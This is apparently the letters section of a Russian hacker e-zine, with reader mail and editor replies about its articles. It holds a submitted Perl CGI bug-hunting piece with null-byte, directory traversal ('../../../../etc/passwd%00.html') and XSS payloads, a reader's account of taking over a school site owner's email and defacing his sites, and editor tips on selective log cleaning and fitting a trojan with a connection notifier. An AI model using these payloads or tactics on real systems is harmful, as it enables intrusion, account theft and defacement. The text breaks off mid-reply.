_-_-_-_- Mailmanz bag -_-_-_-_
-_-_-_-_ -==-==-==-==- _-_-_-_-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Re[2]:
От: [email protected]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Здоров, читал второй выпуск журнала,,:) особо понравилась статейка Примеры
использования Социальной Инженерии, ну лана не по этому я тебе пишу, тут такое
дело, насчет статьи Взлом сервера (использование эксплойтов) признаю что в ней
много не точностей, ну и статья писалась год назад, и смысл в статье был такой
чтобы показать что из под винды можно компить эсксплойты, тока вот с названием
малость переборщил,,да и в самой статье немного напутал так не тот сплоит
компить стал,..вернее выбрал не правильный пример для статьи,,,
И кстати это не оправдание, это просто реакция на реальную критику...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ no comments ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Журнал
От: Clane <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Привет ребята ! Прочитал ваш журнал, вы молодцы ! Огромное вам спасибо за него !
Я хотел бы присоединиться к вашей команде. Уже придумал статью для написания :
"Прокси-сервера. Что это такое.". Что скажите ? Жду ответа.
-------------------------------------------------------
Почтовая служба KM.RU ( www.mail.km.ru )
Скорость и надежность космические!
-------------------------------------------------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ привет. спасибо за предложение, но мы вынуждены от него отказаться. статей о
прокси-серверах очень много как в рунете, так и в сети в целом. если будут
другие интересные мысли, пиши ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Defaced#3 09.txt
От: "Soid" <[email protected]>
Почему нельзя было просто стереть нафиг все из /var/log
Да и где история шелла лежит?!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ потому что нужно не только обезопасить себя от обнаружения, но и сохранить
доступ к машине. если потереть все, то о ней можно забыть. по поводу истории
шелла - ты статью вообще читал или только название?? там все написано ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Травка byShellz
От: digital_g0d <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Доброе вам время суток!
Читая Ваш журнальчик наткнулся на "Травка by Shellz". Хотелось бы прочитать!
Если Вас не затруднит, скинте на мыло плиз.
Зарание спасибо!
P.S. Неплохой журнальчик, но уж больно для скрипт-кидди. Надо бы посерьёзние! А
то малыши на ночь начитаются, а потом херньой страдают. Надо сразу всем
обьяснят, что дэфэйсы, это занятие для гуру после 4 литров пива, а для
начинающих надо читать Баха "Архитектура ОС Юникс" и Бьярна Страустрапа
"Введение в язык С++". Надеюсь, что Вы прислушаетесь к совету! А в общем ничего
не имею против.
--
Think Linux... Be Linux...
[digital_g0d]
[email protected]
http://cydem.org.ua/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ хех, окей. статья лежит вот тут: k1kl1.narod.ru/travka.txt. по поводу журнала:
возможно в чем-то ты прав, и тем не менее, если бы ты знал, сколько
``не-скрипт-кидди'' читают журнал, ты бы удивился. а к советам мы всегда
прислушиваемся, так что спасибо ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: defaced
От: "Dumplex" <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Гы-гы-гы. Да ты садист - ТАКОЙ "сплоит" в массы толка:) Ну да ладно, я по
другому поводу пишу. Журнал реально улучшился (по сравнению с первым номером).
Особенно радует то, что вы преслушиваетесь к мнению читателей. В 3-ем выпуске
мне очень понравился раздел lol, вот только можно было и без нецензурных
выражений обойтись (хотя с ними даже лучше:) В общем продолжайте в том же духе
(в смысле улучшайте журнал).
Dumplex
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ lol ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: статья
От: Zergg <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Вот моя статья...
Если покажетьяся сыроватой - переделаю, а вообще камни прошу не бросать - она у
меня первая.
З.Ы. до выхода журнала я ее нигде публиковать не буду.
З.З.Ы. обязательно скажите бедете публиковать|нет|надо доделать
netw0rm
Поиск багов в Perl скриптах
Хочу сказать что если вы не знаете Перл не имеет смысла читать эту статью —
лучше возьмите учебник по Перлу...
Самой легкой проверкой на наличие багов в скиптах является использование
"проверки на загрязнение" (переключатель -T). Но это никогда не спасет от багов
в скриптах.
1) Обход шаблона:
Бажный скрипт:
#!/usr/bin/perl
use CGI 'param';
my $file = param('file');
if ($file=~/\.html/)
{open FL, "$file"; print <FL>; close FL;}
Т.е. можно получить любой файл с расширением html из папки docs. Существует
старый трюк: указать в параметре file следующие "somefile.pl%00.html", т.е.
указать файл который хотим достать, а потом нуль-символ и необходимую строку.
Скрипт находит .html и разрешает выдать файл, а операционка читают строку до
нуль-символа.
Бажный скрипт:
#!/usr/bin/perl
use CGI 'param';
my $file = param('file');
open FL, "$file.html"; print <FL>; close FL;
Теперь файл никак не проверяется, а к концу файла просто добавляется его
расширение. Ломается аналогично. Передаем в скрипт строку "file=somefile.pl%00".
2) Обход директорий:
Бажный скрипт:
#!/usr/bin/perl
use CGI 'param';
my $file = param('file');
my $dir = 'docs';
if ($file=~/\.html/)
{open FL, "$dir/$file"; print <FL>; close FL;}
Тот самый скрипт с небольшим изменениями Теперь можно смотреть все файлы с
расширением html (для нас просто все :-) ). Ломается легко: к имени файла
добавляется "../". Данная комбинация означает поднятие на одну директорию вверх.
Передаем строку
"file=../somefile.pl%00.html" | "file=../../../../etc/passwd%00.html".
При получении passwd с количеством ../ обычно приходится поэкспериментировать.
Улучшенный, но все равно бажный:
#!/usr/bin/perl
use CGI ':standard';
my $file = param('file');
my $dir = 'docs';
$file=~s/\.\.\///;
print $file;
if ($file=~/\.html/)
{open FL, "$dir/$file"; print <FL>; close FL;}
Тут уже есть зачаток проверки, но ломается очень легко. Достаточно просто
добавить еще одну комбинацию ../. Все дело в том, что проверка заменит только
одну комбинацию ../. Для исправления достаточно было добавить к замене ключи e &
g:
$file=~s/\.\.\\//eg;
Иногда проходит такой трюк: %2e%2e%2f%2e%2e%2fsomefile.pl. Тут комбинация ../
была заменена ее аналогом в URL-кодировке.
3) Вставка тегов
Тут просто. Надо просто проверить все параметры на возможность вставить тег.
Также не надо забывать, что если разрешена вставка некоторых тегов (<img>, <A>,
etc) то появляется возможность вставить javascript. Например если можно вставить
картинку следующим образом [img]http://some.com/img.gif[/img], то можно обмануть
так:
[img]http://'onerror='javascript:...[/img]
4) system()
Стоит проверить все вызовы функций system() и exec().
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ сорри, это статья на очень уж заезженную тему, но все равно спасибо, что
уделил журналу внимание ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: contribution - Соц.Инженерия(может покатит)
От: Roneon <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Выхожу я сегодня часов в восемь в инет - мыл отчекать, и вдруг мне один чел в
аську лезет(знакомый), просит ломануть сайт его школы, который на народе
лежит... Ну, думаю я, посмотрю, но если пароль на "qwerty", но ничего не выйдет.
Захожу, смотрю... Диза ничё, но сразу бросился в глаза "мыльный" линк
"http://[email protected]". Это подвигло меня посмотреть HTML... FrontPage
3.0... Понял, что админ - ламо, решил попробывать восстановить пароль... Но к
какому логину не понятно - и ник админа зарегестрирован на народе, и название
школы... Но ни к одному из них ответа я найти не смог. ( Потом чекаю мыл автора
сайта в гесте. Мыл на front.ru, иду туда. Там снова пытаюсь восстановить пароль
к логину chernikniznik(@front.ru)... Вопрос - "а". Пытался проверить, латинская
она или кириллическая, но ничего за первые секунд 15 не вышло, и решил забить на
это дело. Пишу кириллическую "б" - ответ не верен. Отвечаю кириллической "а" -
"Введите новый пароль:". =)
Ввожу, лезу в мыл, меняю пароль и вопрос. Ответ мой воспроизвести практически
невозможно. =) Ну, порылся малость во всяких регистрационных письмах... У него,
как оказалось, есть ещё сайтик - unlim5.narod.ru - типа первого: диза
нормальная, но FrontPage 3.0... Далее следует письмо с какого-то музыкального
сайта... Логин - unlim5, пароль - 1029. Не долго думая, на народе пишу эти логин
и пароль - всё правильно, сменил пароль, сменить вопрос забыл, дефейснул сайт.
Но это ещё не моя цель. Потом идём на xbase - ломать гест, чтобы он не удалил
мои мессаги... Ну, отсылаем пароль на ящик, введёный при регестрации... У меня
уже было два его ящика, но ничего не пришло - наверное, на ящик, соответствующий
школьному сайту геста зарегена. Топаем снова на народ, лог аут,
shkola1967:1029... OK! Сменил вопрос, сменил пароль, дефейснул(всем ученикам на
радость), отчитался тому челу, который попросил меня об этом, по аське. А теперь
угрызения совести мучают - старался ведь чел, делал... А связаться с ним никак
не могу - всё ведь отобрал... Так что, чел, если ты это читаешь - мыль на
[email protected]...
Мораль сей басни такова: нельзя торопиться при регестрации и нужно ставить на
всё разные пароли(я на всё недавно взломаное три разных пароля поставил).
P.S. "There's no time to discriminate, Hate every motherfucker that's in your way!"
Fucked up by Roneon, 08.11.2003. All rights fucked down.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ спасибо за информацию, думаю она будет полезна кому-либо из читателей журнала.
но на отдельную статью она не катит.. ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Defaced@
От: BoI base <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Хай!
Читаю я ваш журнал... Очень интересно. Только есть некоторые замечания:
1. Рубрику LOL лучше переместить к концу выпуска
2. Разграничивать как-то статьи для начинающих и продвинутых. Скажем, если мне
нужен курс вводных в комплексный хак (выразился? я до сих пор в этом нуждаюсь
:))) статей, то искать по всему выпуску ее - крайне тяжелое дело.
3. Просьба указывать где стёб, а где ирония (чтобы свести количество выбитых
зубов к минимуму).
4. Ни за что не делайте попсовый журнал. Лучше никакой. Мне ][ хватает. С самого
начала он был таким, но если тогда это вуалировалось, то теперь это: получение
халявы, заработок в инете, как построить сайт... И где же связь с названием?
5. Добавить архив с наиболее красивыми дефейсами (или самыми престижными
скальпами :)
К тому же, зря вы так критично относитесь к переводам. Они нужны, ведь хороших
док в этой области крайне мало. Нужно улучшать, товарищи...
И вообще, это никакой не наезд, а _конструктивная_ критика. Мне нравится то, что
есть. Хочется, чтобы это все оставалось именно так.
Всего наилучшего, EVulture.
--
Best regards, EVulture [B.o.I]
BoI mailto:[email protected]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ привет. отвечаем так же, по пунктам:
1. мы вообще в принципе убрали разграничение на рубрики
2. ну это не совсем правильно. самый эффективный подход - читать все подряд, а
если что-то непонятно, то мучать гугл и яндекс на предмет этого вопроса.
по-моему все так учатся
3. руководствуйся здравым смыслом. а вообще мы плохого не пожелаем без явного
указания, так что не волнуйся на этот счет
4. а у нас и не получится делать попсовый журнал, мы в этом просто не
заинтересованы
5. у нас просто нет человека, который бы мог за этим следить и вести это дело -
участников defaced staff можно пересчитать по половине пальцев левой ноги. если
у тебя есть желание вести такой раздел в каждом номере - пиши, договоримся.
только, конечно, об архиве страниц в самом журнале речи быть не может, тк от
этого его размер сильно увеличится, а вот ссылки с комментариями - это всегда
пожалуйста.
что касается переводов, то это несколько расходится с нашими представлениями о
том, каким должен быть журнал. а переводов и без того полно в рунете..
как наезд, твое письмо просто не воспринимается, спасибо за комментарии ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема:
От: Lawyer <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Привет!
Статья не имеет хакерскую направленность, а скорее всего в ней рассказывается о
том как не справедлив мир, она может показаться детской, но после статьи во
втором номере вашего журнала "Хакеры и общество" решил все таки отослать вам эту
статью...надеюсь что она вам понравится...удачи!
Автор: Lawyer [MoL]
Сайт: http://mol.bh99.biz
Это статья относится к разряду тех, о который принято говорить, как о бреде,
который взбрел в голову автору. А почему бы и нет? Тема может показаться
какой-то детской, но она подтверждает то что... а вообще то, что она
подтверждает, по вашему мнению, буду рад узнать. Присылайте свои отзыва о статье
на [email protected] Буду ждать.
Однажды мне в руки попал компьютерный журнал, в котором было интервью с одним из
админов провайдера предоставляющего интернет услуги и
междугородние/международные звонки, так вот в интервью спросили у этого админа о
троянах, которые незаметно загружаются на комп жертвы и звонят, куда ни будь из
деревни Простаквашина в Нью-Йорк, и грузят какую-нибудь хрень... конечно жертва
не знает то что "что-то" скрытно звонит в другую страну, и когда жертве приходит
огромный счет "за восьмерку", то он естественно возмущается. Так вот журналист
спросил у админа, что делать если все таки такое произошло и троян сам, каким то
образом дозвонилась, куда ни будь за рубеж, и "натикало" за звонок не малые
деньги. На что админ ответил, цитирую: "Платить, все равно придется! Сам
виноват!". Вот такие вот дела. У меня сразу возникли злые мысли. Вот провайдера
говорит сам виноват. Ну, так как они с юзерами, так и хакеры с ними! Взломали
провайдера, что сказать? Сами виноваты! Надо больше безопасности внимание
уделять! Вот так вот. Нехорошо как то получается, если юзер не знал и ему надо
платить немалые бабки так это так как бы и надо, а вот если взломали провайдера
или еще кого ни будь, так здесь хакер-крайный.
Если юзер не знал что такое вообще возможно то получается это он виноват, а если
был произведен взлом провайдера то не он виноват, а хакер! А ведь провайдера сам
виноват то, что не защитился. Пример я представляю себе таким. Представим, что
некий мальчуган обозвал другого мальчугана, и если первый побил второго то это
как бы хорошо, первому-хлеб да соль, а вот если второй побил первого, то его на
15 суток! Тут первый мальчуган-это провайдер, ну а второй это хакер. Вот такие
вот дела. Когда это закончиться?...
P.S: Тут у меня еще одна злая мысль в голове пронеслась. Эх, устроить бы
всемирную акцию по отказу на месяц или более от пользования интернета, пусть
провайдеры разорятся. Ведь это возможно! И тогда уж посмотрим, кому худо
будет:-)))
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ к сожалению, мы не публикуем уже опубликованные статьи - чтобы статья прошла в
номер, она должна быть подготовлена именно для журнала, и до его выхода нигде не
публиковаться ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: Defaced (может быть полезная статья)
От: <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Привет всем!
Меня раньше звали Delfyk и я писал статью для Defaced 2 (Пароли с доставкой на
ICQ).Сегодня [root] мне сказал что Defaced 3 вышел.... Я конечно же скачал на
лету... (2 мега в сек) И как приду с работы сразу прочту... Ну я вот к чему:
хотел статейку накатать какую нибудь... и пропустил номер!
Вот свежая статейка, может пригодится:
http://www.sunlimited.ru/hacking/text/hack_sunlimited.php
Журнал, как и предыдущие будет висеть на моем сайте в соответствующем разделе!
Если чё надо - рад буду помочь! А на счёт журнала в реале (через навигатор), так
я ЗА! Пусть будет в двух вариантах!
The Neption
www.sunlimited.ru
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ привет. спасибо за письмо. смотри ответ на предыдущее сообщение, а так бы
опубликовали. за зеркало тоже спасибо! ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: defaced
От: "Борис lovchyБезруков" <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Алоха, начнём. (d3_17)
> //===( 0x2 :: Механизм сокетов и PHP
> )==========================================
>Механизм работы с сокетами в PHP основывается на всем известных Berkley
> sockets
Он на них не основывается. Он предоставляет к ним доступ на достаточно высоком
уровне.
> Многие из этих функций не документированы и известны лишь параметры. Потому если
> вас что-то из этого заинтересует - вперед на php.net и читайте последнюю версию
> мануала на тему Socket functions
www.php.net/socket -- для чего копипаст нужен?
> в этом массиве задаем описания для сервисов, обслуживающих на соответствующих портах
> // главное чтобы смещение в массиве порта соответствовало смещению в массиве его описания
> // то есть если смещение (индекс) порта с номером 23 == 2 (считаем с 0),
Ассоциативные массивы используем. $data = array ('23'=>'ftp');
Потом foreach ($data as $port => $serviceName) {}
> $who = $HTTP_SERVER_VARS['REMOTE_ADDR'];
Устаревший подход. $_SERVER['REMOTE_ADDR'];
> $chost = strip_tags($hostname); //загоняем сюда значение параметра $hostname,
> // этот параметр необходимо передавать из html-формы, етц с именем hostname
Опять неграмотный код. $_POST['hostname'].
> for($cnt=0; $cnt<$white_power_cnt; $cnt++)
Я правильно понимаю -- ты подсчитал изначально $white_power_cnt чтобы не
использовать в итерации count? А как насчёт for ($i; isset($blabla[$i]; $i++)?
> если при выполнении данной строки кода
> // возникнет ошибка - ее выводить не нужно.
А зачем тогда в начале error_reporting('E_ALL');?
> // ну и напоследок освобождаем память, выделенную под переменные. кому нужны значения
> // наших переменных у прова в свопе? ;)
PHP -- язык интерпритации относительно высокого уровня. При окончании исполнения
скрипта все переменные очищаются автоматически. Эти строки -- морание бумаги.
Даже если тебе всё же хочется очистить всё это вручную (а параноя, как известно,
лечится) делаем просто unset ($GLOBALS);
> (+) если вам хочется спросить совета у продвинутого PHP-кодера - обратитесь
> к L0vCh1Y 8)
Спасибо. Только две поправки:
1) недавно я объявил войну идиотам и, в первую очередь, себе. С тех пор я lovchy.
2) если в будущем на меня будут ссылки -- http://www.lovchy.info, [email protected]. Пытливый ум сразу ставит пред собой вопрос: а как с ним связаться?
В целом о статье: тема стара. Код явно не эксперта в PHP (не обижайся),
разбавлен туевой хучей воды html (зачем? Те, у кого есть хотя бы немного в
голове сами оформят как надо, остальных на рудники и в армию -- будет хотя бы
какая то польза для родины).
black_code, у меня о тебе очень хорошее впечатление. Ты сильный кодер и
великолепно то, что ты пытаешься делиться с людьми знаниями. Но в следующий раз,
если ты не будешь стопроцентно уверен в своей квалификации -- проконсультируйся.
В противном случае, от статей только врёд.
Да и ещё -- переползай писать в vim и забей на табуляцию, используй 4 пробела. Если тебе надо -- могу скинуть свой конфиг http://www.lovchy.gorcy.ru/blog/view/?id=24).
Про defaced говорить не буду, за исключением одного замечания (см. ниже). Все и
без того знают моё далеко не позитивное мнение. Не хочу вдаваться в лишние,
абсолютно бессмысленные дебаты. Просто желаю вам того, чего не было ещё ни у
одного из известных мне русских проектов -- доказать мне же, что я был не прав
касательно сути и общей перспективности вашей работы. Доказать делом, а не
нелепыми комментариями в следующем номере журнала.
> - имена постоянных авторов Defaced не приводятся. все статьи подписываются как ``by defaced staff''
Мягко выражаясь -- это называется строить из себя black-hat'ов. Но мягкость
критики мне не свойственна. Это цирк.
C наилучшими пожеланиями, Борис lovchy Безруков.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: defaced
От: Roneon <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Мне лично последний номер больше предидущих понравился... Папка Include - енто
есть хорошо. Сейчас уже из журнала свои письма почитал - понял, какое это было
Г... Спасибо хоть, что не откомментировали! =) Мне кажется, полезным ещё было бы
завести один файлик, и там коротко описывать быги в скриптах(по строчке - только
пример использования бага). Насчёт ZUD Team - енто есть круто, но если
представить себя на их месте... Вроде как, никому ничего плохого не сделали...
Да, допустили пару ошибок - ну и что же с того? Это сейчас уже на это всё со
стороны легко смотреть, а тогда, на месте, от первого лица...
Пара слов об отчёте о DEFACED@ by SecurityLab: в чём-то они и правы, но далеко
не во всём. И вообще, они должны быть благодарны defaced, т.к. в defaced
описывается множество взломов при помощи XS, который выпускает PT, при поддержке
которого и живёт SL...
Далее: статьи о взломах. Читать, конечно же, интересно, но каждый раз - одно и
то же. Всегда чел заходит на сайт, видит знакомый дырявый скрипт и дефейсит сайт
или сканит этот сайт XSpider'ом, а потом в дело идут сплойты или снова дефейс
через дырявые скрипты... Но, тем не менее, как уже упомяналось выше, читать всё
равно интересно.
FAQ... Кстати, спасибо за ответ на мой вопрос, но я имел ввиду именно "замену
условных переходов в бинарных исполнимых файлах". Но всё равно спасибо, что
подсуетились.
>>Defaced-очень хороший журнал!:)
>>Расскажите pls о Proxy, по подробнее, если можно!:)))))
>>[ письмо пришло слишком поздно, но я обещаю, что в следующем номере
обязательно
>>будет подробная статья по теме ]
А чего там писать-то? Минут за десять написать можно... Причём, за десять - это
принцип работы, устройство, и т.д., а просто мануал - это минуты три-четыре...
Хотя, посмотрим следующий номер журнала - может, там будут рассмотрены приёмы
установки сниффаков на прокси(на свои прокси) или что-то типа этого...
CGI Trojans - хорошая статейка.
Чистка логов в Linux/FreeBSD - тоже полезная весчь.
D3_11 - статейка, как и все остальные: читать интересно, но соверешенно ничего
нового в ней нету. Кстати, об этих расписках: никакой силы такая расписка не
имеет. Гражданин РФ(и Украины, наверное, тоже) не может взять на себя
ответственность за преступления другого гражданина РФ. Этой распиской c0d3x
только примазал ламуха к делу: c0d3x, если будет пойман, понесёт такое же
наказание, какое понёс бы и без этой расписки, но ещё и тот ламух понесёт
наказание(меньшее, чем c0d3x).
D3_14: по мне, дык слишком простая статейка... Любой может написать сканнер
портов на Delphi при помощи ClientSocket'a... Конечно же, это - консоль, поэтому
это круче... Но если кто-то так люит консоль и лезет в хак, то он уже давно
сидит по каким-нибудь UNIX'ом.
D3_17: D3_14 отдыхает. А в одном выпуске с этой статейкой, мне кажется, ему и не
место... Хотя, может быть, если кому-то влом закачивать файл(вспоминать пароль и
название своего сайта), тогда D3_14 круче. =) Я бы скопировал даже на
хард(вытащил бы из архива, то есть) эту статейку(d3_17), но у меня места
осталось - чуть больше одного мегабайта, а удалять файлы жалко... Всё нужное...
Я уже даже шахматы удалил...
D3_13... Я уж молчу об опечатках - у меня их тоже дофига бывает, но перед "что"
запятую не поставить... Слишком много текста... Я пробежался глазами по
статейке, и так не понял, зачем это всё нужно. Когда инет закончится - прочитаю.
D3_16 - статейка хорошая, но это уже было(Во-первых, у Over'a G, а во-вторых, у
того чела, который написал и выложил исходники того троя, которого мы знаем под
названием ALB 1.0).
D3_15. Во-первых, прошу поднять руку всех, кто о такой возможности не знал...
Поднимает руку Лужков. Стаья, чесно скажу, ламерская(не хотел никого обидеть),
да и сделать это незамеченным будет крайне сложно. Ну и до провода добраться
можно бывает в редких случаях. А насчёт сравнения вас с хакером и phrack'ом...
По мне, дык всё - на одном уровне. Везде есть и ламерские статейки, и статьи,
заслуживающие внимания... Хотя, в phrack'e ламерских нету... Ну, я не видел.
Кстати, хороший вопросик в FAQ:
"Прива!!!
Возникла одна проблема???
Заслал я одному сервак...всё вроде пучком , а когда
запустил клиента , то он его отказываеться находить.
Порт то я написал правельно , а вот IP хрен его знаеть какой нужно писать и
оставил тот который был там...
вот и вся бида , неработаеть...
Я не чего против не имею , прога LD просто рулззз...,
тока вот в голове у меня пока чёто видемо маловатенько будеть...Помоги
разобраться с ентой фичей...Плииизззз...
Жду ответа!!! ...хе , как соловей лета))
-=k77=-"
Ну аот и усё, жду четвёртого номера! ;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ привет. насчет прокси - подумали и решили что не стоит этим заниматься. рунет
кишит статьями на эту тему. а по поводу твоего вопроса.. была где-то программа,
называлась то ли informer или как-то так. вот ее к троянчику и приклеить
джойнером, чтобы она говорила когда юзер к сети подключился. странно, я думал
что все современные трояны этой функцией снабжены - дело то пустяковое ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: defaced
От: <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Hello d3f4c3d!
Пара строу по поводу е-зина: он получился отменный! (как бы там не говорили
враги и ламеры, приверженцы ][-образного стаффа :) ; после прочтения первых трех
выпусков у меня сложились самые хорошие впечатления, но, как читателю у меня
есть чего пожелать. Во-перывых, очень жаль, что вы решили отказаться от обзора
всяких дыр и сплоитов, оставив этот труд таким монстрам как bugtraq и пр. С
одной стороны, конечно они сделают это круче, но с другой - у вас был свой
собственный, очень удобный и оригинальный способ подачи материала. Так что,
очень жалею. Теперь, предложение по поводу того, о чем бы хотелось прочитать в
последующих выпусках. Очень хочется увидеть материал по поводу сокрытия
источника атаки, а именно: различные виды прокси, построение цепочек,
туннелирование, обзор необходимых программ (в особенности для *nix, т.к. в
виндовсе нет ничего такого, что представляло бы трудность).
Респект, и наилучшие пожелания!
fizzbin
ЗЫ:
а это наверное в раздел faq: почему я не могу присоежиниться на 25-й порт ни
дного почтового сервака через халявный socks4,5 прокси? Пробовал и под виндовсом
(sockscap, sockschain) и под линуксом (proxychain). На 110-й соединяюсь, а на
25-й - нет. Ума не приложу, где тут подстава... Еще раз - всего нилучшего!
__________
www.newmail.ru -- Новая Почта для нового поколения.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ спасибо за комментарий. будут такие статьи, обязательно. насчет твоего
вопроса. никогда этим софтом не пользовался, поэтому ответить затрудняюсь. но,
возможно, кто-то из читающих это письмо знает и напишет тебе ;) ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Diatel_brrr <[email protected]>
Тема: хмм....
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Hello d3f4c3d,
я не давно прочел все 3 номера, хмм... нашел там много инетресного и полезного,
хотя екоторые типы статей я бы убрал как тип. Но вообще я по другому поводу: у
меня есть пара опросов по проекту.
1)Могу ли я распростронять статьи из Defaced? Нужно ли делать ссылку на журнал?
2)Есть ли какая-то направленность у журнала, то есть приветствуются ли статьи по
рограммированию, администрированию и тд.?
3)Если я хочу написать статью, как быть, как это с вами согласовать? а если у
меня нет идей о чем написать, что делать ? :)
PS: Наверно об этом всем и написано гденить у вас на сайте, форуме, но... халява
кончилась, денег нету на инет, осталася тока мыла :/
--
BRRR Tyk-Tyk-Tyk,
Diatel mailto:[email protected]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ 1. вообще мы не против распространения журнала в том виде, в котором ты его
получил на сайте журнала [ в виде .zip, .tgz архива ]. при этом ссылку можно не
делать, поскольку там и так много ссылок, да и потом теперь журнал не имеет
постоянного места жительства. распространение отдельных статей из журнала не
